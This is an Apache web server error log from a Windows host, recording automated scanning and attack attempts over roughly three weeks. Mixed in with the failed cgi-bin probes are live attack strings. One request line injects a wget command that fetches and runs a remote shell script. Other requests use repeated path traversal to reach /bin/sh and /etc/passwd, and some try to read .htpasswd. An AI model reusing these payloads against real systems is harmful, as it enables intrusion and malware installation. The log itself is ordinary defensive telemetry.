[Fri Aug 08 11:49:57.893983 2025] [cgi:error] [pid 5372:tid 1100] [client 68.183.181.253:35286] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Fri Aug 08 11:50:04.529749 2025] [core:error] [pid 5372:tid 1032] (20024)The given path is misformatted or contained invalid characters: [client 68.183.181.253:60756] AH00127: Cannot map GET /error/%3C!-- HTTP/1.1 to file
[Fri Aug 08 11:51:32.906591 2025] [core:error] [pid 5372:tid 1124] (20024)The given path is misformatted or contained invalid characters: [client 68.183.181.253:44194] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Fri Aug 08 21:06:37.510711 2025] [cgi:error] [pid 5372:tid 536] [client 167.172.165.7:5216] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Fri Aug 08 22:53:53.631591 2025] [cgi:error] [pid 5372:tid 1108] [client 66.132.153.51:41100] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri Aug 08 22:57:59.818526 2025] [cgi:error] [pid 5372:tid 1108] [client 199.45.154.123:58814] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat Aug 09 10:12:06.289705 2025] [cgi:error] [pid 5372:tid 1140] [client 94.102.49.193:42248] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat Aug 09 13:40:31.923394 2025] [cgi:error] [pid 5372:tid 1108] [client 34.76.34.183:55658] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat Aug 09 16:35:44.293792 2025] [core:error] [pid 5372:tid 1036] [client 217.145.229.33:43194] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sat Aug 09 17:08:36.903010 2025] [cgi:error] [pid 5372:tid 1100] [client 3.212.72.254:49384] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat Aug 09 17:09:05.562393 2025] [core:error] [pid 5372:tid 1040] (20024)The given path is misformatted or contained invalid characters: [client 3.212.72.254:23264] AH00127: Cannot map GET /error/%3C!-- HTTP/1.1 to file
[Sat Aug 09 17:09:07.523445 2025] [mpm_winnt:error] [pid 5372:tid 4936] AH00326: Server ran out of threads to serve requests. Consider raising the ThreadsPerChild setting
[Sat Aug 09 18:12:38.054754 2025] [cgi:error] [pid 5372:tid 1064] [client 66.132.153.62:35402] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat Aug 09 19:31:15.538187 2025] [cgi:error] [pid 5372:tid 1064] [client 45.156.87.165:55836] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/nobody
[Sat Aug 09 23:08:58.430447 2025] [cgi:error] [pid 5372:tid 536] [client 162.142.125.222:55260] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun Aug 10 18:28:13.874082 2025] [cgi:error] [pid 5372:tid 1064] [client 34.253.55.27:36274] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sun Aug 10 20:45:45.703104 2025] [cgi:error] [pid 5372:tid 468] [client 15.222.77.46:49124] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sun Aug 10 20:55:42.165468 2025] [cgi:error] [pid 5372:tid 468] [client 43.135.130.202:37770] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sun Aug 10 22:26:25.514600 2025] [core:error] [pid 5372:tid 536] (20024)The given path is misformatted or contained invalid characters: [client 45.156.87.165:33272] AH00127: Cannot map GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${IFS} HTTP/1.0 to file
[Mon Aug 11 01:23:06.238678 2025] [cgi:error] [pid 5372:tid 468] [client 167.94.145.104:53492] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon Aug 11 02:21:17.958904 2025] [core:error] [pid 5372:tid 536] [client 190.92.243.48:38886] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Aug 11 05:06:12.569701 2025] [core:error] [pid 5372:tid 468] [client 111.119.234.186:53892] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Aug 11 08:58:16.126476 2025] [cgi:error] [pid 5372:tid 536] [client 43.164.197.209:50872] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Mon Aug 11 10:31:35.615773 2025] [core:error] [pid 5372:tid 468] [client 217.156.22.214:41420] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Aug 11 11:13:14.972864 2025] [cgi:error] [pid 5372:tid 472] [client 45.156.87.165:57546] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Aug 11 13:48:44.613800 2025] [cgi:error] [pid 5372:tid 536] [client 45.156.87.165:34360] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Aug 11 16:52:23.357655 2025] [core:error] [pid 5372:tid 468] [client 188.165.233.167:43652] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Aug 11 17:49:35.990979 2025] [core:error] [pid 5372:tid 468] [client 183.87.153.86:44494] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Tue Aug 12 01:56:10.908959 2025] [cgi:error] [pid 5372:tid 468] [client 167.94.138.162:42446] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue Aug 12 01:58:10.260838 2025] [cgi:error] [pid 5372:tid 468] [client 66.132.153.51:56708] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue Aug 12 02:24:48.352476 2025] [cgi:error] [pid 5372:tid 1056] [client 193.138.218.143:51694] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Tue Aug 12 08:00:31.631463 2025] [core:error] [pid 5372:tid 1044] [client 111.119.234.186:53608] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Wed Aug 13 02:03:47.097891 2025] [core:error] [pid 5372:tid 1064] [client 153.120.7.138:51154] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Wed Aug 13 02:13:34.102373 2025] [cgi:error] [pid 5372:tid 1064] [client 66.132.153.53:45156] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Aug 13 07:46:05.210860 2025] [cgi:error] [pid 5372:tid 1044] [client 167.94.145.96:47882] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Aug 13 08:01:06.081712 2025] [mpm_winnt:notice] [pid 3560:tid 736] AH00428: Parent: child process 5372 exited with status 3221225477 -- Restarting.
[Wed Aug 13 08:01:06.097670 2025] [mpm_winnt:notice] [pid 3560:tid 736] AH00455: Apache/2.4.46 (Win64) configured -- resuming normal operations
[Wed Aug 13 08:01:06.097670 2025] [mpm_winnt:notice] [pid 3560:tid 736] AH00456: Apache Lounge VS16 Server built: Dec 9 2020 13:42:35
[Wed Aug 13 08:01:06.097670 2025] [core:notice] [pid 3560:tid 736] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Wed Aug 13 08:01:06.098667 2025] [mpm_winnt:notice] [pid 3560:tid 736] AH00418: Parent: Created child process 1040
[Wed Aug 13 08:01:06.415819 2025] [mpm_winnt:notice] [pid 1040:tid 612] AH00354: Child: Starting 64 worker threads.
[Wed Aug 13 09:04:48.234424 2025] [core:error] [pid 1040:tid 1132] [client 185.226.197.62:53573] AH00126: Invalid URI in request 'apache2/icons/sphere1.png' 'HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1'
[Wed Aug 13 09:05:28.633678 2025] [cgi:error] [pid 1040:tid 1120] [client 185.226.197.64:47249] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/main.pl
[Wed Aug 13 09:06:39.330855 2025] [cgi:error] [pid 1040:tid 1140] [client 185.226.197.64:38879] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Wed Aug 13 12:40:19.492923 2025] [core:error] [pid 1040:tid 1108] [client 137.131.43.224:54612] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Wed Aug 13 15:18:11.319568 2025] [cgi:error] [pid 1040:tid 1132] [client 207.154.206.179:46468] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Thu Aug 14 03:33:47.916327 2025] [cgi:error] [pid 1040:tid 1120] [client 66.132.153.57:60462] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Thu Aug 14 04:05:45.227552 2025] [core:error] [pid 1040:tid 1120] [client 197.220.93.117:46822] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Thu Aug 14 14:47:20.664550 2025] [cgi:error] [pid 1040:tid 1120] [client 66.132.153.51:47096] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri Aug 15 01:50:39.187636 2025] [cgi:error] [pid 1040:tid 1104] [client 167.94.146.52:35594] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri Aug 15 14:12:29.934516 2025] [cgi:error] [pid 1040:tid 1140] [client 66.132.153.57:35322] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri Aug 15 17:02:47.652732 2025] [cgi:error] [pid 1040:tid 1140] [client 167.94.146.53:50188] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon Aug 18 10:38:37.325997 2025] [cgi:error] [pid 1040:tid 1140] [client 43.165.189.206:42372] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Mon Aug 18 17:27:55.397626 2025] [core:error] [pid 1040:tid 1108] [client 101.126.132.95:53790] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Aug 18 18:26:08.560670 2025] [cgi:error] [pid 1040:tid 1140] [client 170.106.147.63:44536] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Mon Aug 18 20:04:58.703007 2025] [core:error] [pid 1040:tid 1140] (20024)The given path is misformatted or contained invalid characters: [client 43.135.148.92:45582] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Mon Aug 18 21:12:39.705588 2025] [cgi:error] [pid 1040:tid 1140] [client 66.132.153.52:55452] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon Aug 18 22:00:40.141760 2025] [core:error] [pid 1040:tid 1140] [client 103.253.21.69:55496] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Aug 18 22:10:18.232595 2025] [cgi:error] [pid 1040:tid 1132] [client 128.14.225.253:50386] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Tue Aug 19 06:44:27.373255 2025] [cgi:error] [pid 1040:tid 1076] [client 199.45.155.102:40300] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue Aug 19 16:27:59.590631 2025] [core:error] [pid 1040:tid 1092] [client 159.138.138.163:47188] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Tue Aug 19 20:35:56.907640 2025] [cgi:error] [pid 1040:tid 1092] [client 66.132.153.51:38530] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Aug 20 04:26:00.828792 2025] [core:error] [pid 1040:tid 1084] [client 115.248.8.65:44976] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Wed Aug 20 20:55:33.284157 2025] [cgi:error] [pid 1040:tid 1084] [client 167.94.138.49:54002] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Aug 20 21:36:47.726361 2025] [core:error] [pid 1040:tid 1068] [client 185.177.72.46:48458] AH00126: Invalid URI in request 'etc/passwd' 'GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1'
[Wed Aug 20 21:39:01.724559 2025] [authz_core:error] [pid 1040:tid 1068] [client 185.177.72.46:7046] AH01630: client denied by server configuration: C:/Apache24/.htaccess
[Wed Aug 20 21:39:03.150107 2025] [authz_core:error] [pid 1040:tid 1068] [client 185.177.72.46:7046] AH01630: client denied by server configuration: C:/Apache24/.htpasswd
[Wed Aug 20 21:39:36.702111 2025] [core:error] [pid 1040:tid 1068] [client 185.177.72.46:7046] AH00126: Invalid URI in request 'etc/passwd' 'GET //1.1.1.1/../../../etc/passwd HTTP/1.1'
[Thu Aug 21 00:05:54.547728 2025] [cgi:error] [pid 1040:tid 1084] [client 199.45.154.128:33162] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Thu Aug 21 00:23:26.451209 2025] [cgi:error] [pid 1040:tid 1084] [client 66.132.153.56:51414] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Thu Aug 21 07:24:08.748779 2025] [core:error] [pid 1040:tid 1084] [client 195.170.172.128:41984] AH00126: Invalid URI in request 'stager64' 'GET stager64 HTTP/1.1'
[Thu Aug 21 08:51:24.491540 2025] [cgi:error] [pid 1040:tid 1068] [client 66.132.153.56:44432] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri Aug 22 16:01:44.009562 2025] [cgi:error] [pid 1040:tid 1004] [client 139.162.142.167:42762] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/info.cgi
[Fri Aug 22 16:01:44.710840 2025] [cgi:error] [pid 1040:tid 1140] [client 139.162.142.167:43008] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/param.cgi
[Fri Aug 22 16:01:45.921212 2025] [cgi:error] [pid 1040:tid 1076] [client 139.162.142.167:43234] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Fri Aug 22 16:01:46.586744 2025] [cgi:error] [pid 1040:tid 1048] [client 139.162.142.167:43458] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Fri Aug 22 18:36:25.694278 2025] [cgi:error] [pid 1040:tid 1016] [client 66.132.153.60:58344] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri Aug 22 21:32:30.673829 2025] [cgi:error] [pid 1040:tid 1092] [client 43.153.71.12:52956] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat Aug 23 06:31:41.769371 2025] [cgi:error] [pid 1040:tid 1092] [client 66.132.153.54:57278] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat Aug 23 09:00:31.558976 2025] [cgi:error] [pid 1040:tid 1016] [client 49.51.52.250:59204] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat Aug 23 13:55:39.457752 2025] [cgi:error] [pid 1040:tid 1092] [client 34.78.243.22:56412] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat Aug 23 17:52:36.254959 2025] [core:error] [pid 1040:tid 1092] [client 62.169.17.65:50464] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sun Aug 24 04:44:29.588040 2025] [cgi:error] [pid 1040:tid 1016] [client 167.94.145.98:36846] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun Aug 24 15:28:30.312523 2025] [cgi:error] [pid 1040:tid 1016] [client 66.132.153.51:44372] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun Aug 24 18:30:46.424887 2025] [cgi:error] [pid 1040:tid 1092] [client 3.248.77.100:42826] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sun Aug 24 20:02:31.066740 2025] [core:error] [pid 1040:tid 1092] [client 111.119.234.186:38886] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sun Aug 24 20:28:09.480576 2025] [cgi:error] [pid 1040:tid 1092] [client 206.168.34.119:55156] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon Aug 25 03:44:55.201062 2025] [win32:error] [pid 1040:tid 1076] [client 196.251.73.250:46652] AH02102: C:/Apache24/cgi-bin/printenv.pl is not executable; ensure interpreted scripts have "#!" or "'!" first line
[Mon Aug 25 03:44:55.201062 2025] [cgi:error] [pid 1040:tid 1076] (9)Bad file descriptor: [client 196.251.73.250:46652] AH01222: don't know how to spawn child process: C:/Apache24/cgi-bin/printenv.pl
[Mon Aug 25 05:34:33.940064 2025] [core:error] [pid 1040:tid 1076] [client 43.246.198.148:55112] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Aug 25 06:06:53.796372 2025] [core:error] [pid 1040:tid 1016] [client 195.170.172.128:60750] AH00126: Invalid URI in request 'stager64' 'GET stager64 HTTP/1.1'
[Mon Aug 25 13:51:43.628095 2025] [core:error] [pid 1040:tid 1016] [client 150.241.115.7:46040] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Aug 25 14:23:45.421192 2025] [core:error] [pid 1040:tid 1016] [client 197.220.93.100:44344] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Aug 25 14:37:34.526594 2025] [cgi:error] [pid 1040:tid 1040] [client 123.58.207.155:52052] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Mon Aug 25 15:51:03.410621 2025] [cgi:error] [pid 1040:tid 1120] [client 66.132.153.53:51140] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon Aug 25 20:36:45.684211 2025] [cgi:error] [pid 1040:tid 1004] [client 167.94.145.100:37282] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue Aug 26 08:29:55.727088 2025] [core:error] [pid 1040:tid 1120] [client 106.51.109.9:37762] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Tue Aug 26 20:47:07.842987 2025] [cgi:error] [pid 1040:tid 1120] [client 162.142.125.127:59164] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Aug 27 04:53:07.947241 2025] [cgi:error] [pid 1040:tid 1120] [client 167.94.146.50:56200] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Aug 27 17:12:14.092198 2025] [cgi:error] [pid 1040:tid 1120] [client 185.169.4.184:45868] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 17:28:22.204655 2025] [cgi:error] [pid 1040:tid 1096] [client 185.169.4.184:48942] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 19:22:12.975510 2025] [core:error] [pid 1040:tid 1120] [client 115.190.75.127:46602] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Wed Aug 27 20:06:51.763074 2025] [cgi:error] [pid 1040:tid 1120] [client 66.132.153.56:57032] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Thu Aug 28 03:51:07.803818 2025] [cgi:error] [pid 1040:tid 1120] [client 43.157.170.126:53842] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Thu Aug 28 06:58:03.940088 2025] [cgi:error] [pid 1040:tid 1120] [client 43.157.170.126:47074] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Thu Aug 28 08:38:45.515013 2025] [core:error] [pid 1040:tid 1120] (20024)The given path is misformatted or contained invalid characters: [client 43.133.14.237:44022] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Thu Aug 28 17:17:25.689739 2025] [core:warn] [pid 3252:tid 756] AH00098: pid file C:/Apache24/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Thu Aug 28 17:17:25.728210 2025] [mpm_winnt:notice] [pid 3252:tid 756] AH00455: Apache/2.4.46 (Win64) configured -- resuming normal operations
[Thu Aug 28 17:17:25.728210 2025] [mpm_winnt:notice] [pid 3252:tid 756] AH00456: Apache Lounge VS16 Server built: Dec 9 2020 13:42:35
[Thu Aug 28 17:17:25.728210 2025] [core:notice] [pid 3252:tid 756] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Thu Aug 28 17:17:25.728210 2025] [mpm_winnt:notice] [pid 3252:tid 756] AH00418: Parent: Created child process 5044
[Thu Aug 28 17:17:26.311353 2025] [mpm_winnt:notice] [pid 5044:tid 624] AH00354: Child: Starting 64 worker threads.
[Fri Aug 29 15:23:25.274986 2025] [cgi:error] [pid 5044:tid 1124] [client 45.156.128.113:55339] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/main.pl
[Fri Aug 29 15:24:00.653239 2025] [core:error] [pid 5044:tid 1136] [client 45.156.128.112:55751] AH00126: Invalid URI in request 'apache2/icons/sphere1.png' 'HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1'
[Fri Aug 29 15:29:09.246501 2025] [cgi:error] [pid 5044:tid 1132] [client 45.156.128.113:47511] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Sat Aug 30 16:45:49.731780 2025] [core:error] [pid 5044:tid 1132] [client 197.220.93.100:39602] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sat Aug 30 17:05:36.475282 2025] [cgi:error] [pid 5044:tid 1140] [client 66.132.153.59:58156] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat Aug 30 18:00:36.743765 2025] [cgi:error] [pid 5044:tid 1132] [client 162.142.125.118:55146] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat Aug 30 22:34:10.257025 2025] [cgi:error] [pid 5044:tid 1136] [client 64.226.67.179:24130] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Sun Aug 31 10:29:53.967363 2025] [cgi:error] [pid 5044:tid 1100] [client 1.163.254.87:50788] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sun Aug 31 12:07:33.576866 2025] [core:error] [pid 5044:tid 1120] [client 188.239.21.7:51430] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sun Aug 31 12:26:47.504387 2025] [core:error] [pid 5044:tid 1120] [client 103.82.20.226:39442] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sun Aug 31 16:08:30.765783 2025] [cgi:error] [pid 5044:tid 1120] [client 66.132.153.52:56322] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun Aug 31 18:32:44.919337 2025] [cgi:error] [pid 5044:tid 964] [client 52.16.60.102:56288] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sun Aug 31 18:53:25.299038 2025] [cgi:error] [pid 5044:tid 1120] [client 206.168.34.119:43902] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun Aug 31 21:02:13.889341 2025] [cgi:error] [pid 5044:tid 1120] [client 167.94.138.168:58596] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun Aug 31 22:49:09.156555 2025] [core:error] [pid 5044:tid 1120] [client 103.251.93.98:36928] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Sep 01 12:23:50.807425 2025] [core:error] [pid 5044:tid 1120] [client 92.55.190.215:50766] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Sep 01 12:53:08.994701 2025] [cgi:error] [pid 5044:tid 1100] [client 172.233.58.223:36800] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/info.cgi
[Mon Sep 01 12:53:09.942881 2025] [cgi:error] [pid 5044:tid 964] [client 172.233.58.223:37084] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/param.cgi
[Mon Sep 01 12:53:11.293762 2025] [cgi:error] [pid 5044:tid 964] [client 172.233.58.223:37424] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Mon Sep 01 12:53:11.705832 2025] [cgi:error] [pid 5044:tid 1140] [client 172.233.58.223:37504] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 01 13:53:56.143802 2025] [cgi:error] [pid 5044:tid 1000] [client 204.76.203.155:46960] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 01 14:40:07.977202 2025] [cgi:error] [pid 5044:tid 1112] [client 204.76.203.155:53998] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 01 15:25:20.264003 2025] [core:error] [pid 5044:tid 948] [client 212.113.102.147:35520] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Sep 01 16:08:06.089212 2025] [cgi:error] [pid 5044:tid 948] [client 204.76.203.155:48484] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 01 17:01:14.594142 2025] [cgi:error] [pid 5044:tid 948] [client 204.76.203.155:59658] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 01 18:28:27.551539 2025] [cgi:error] [pid 5044:tid 948] [client 204.76.203.155:45042] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
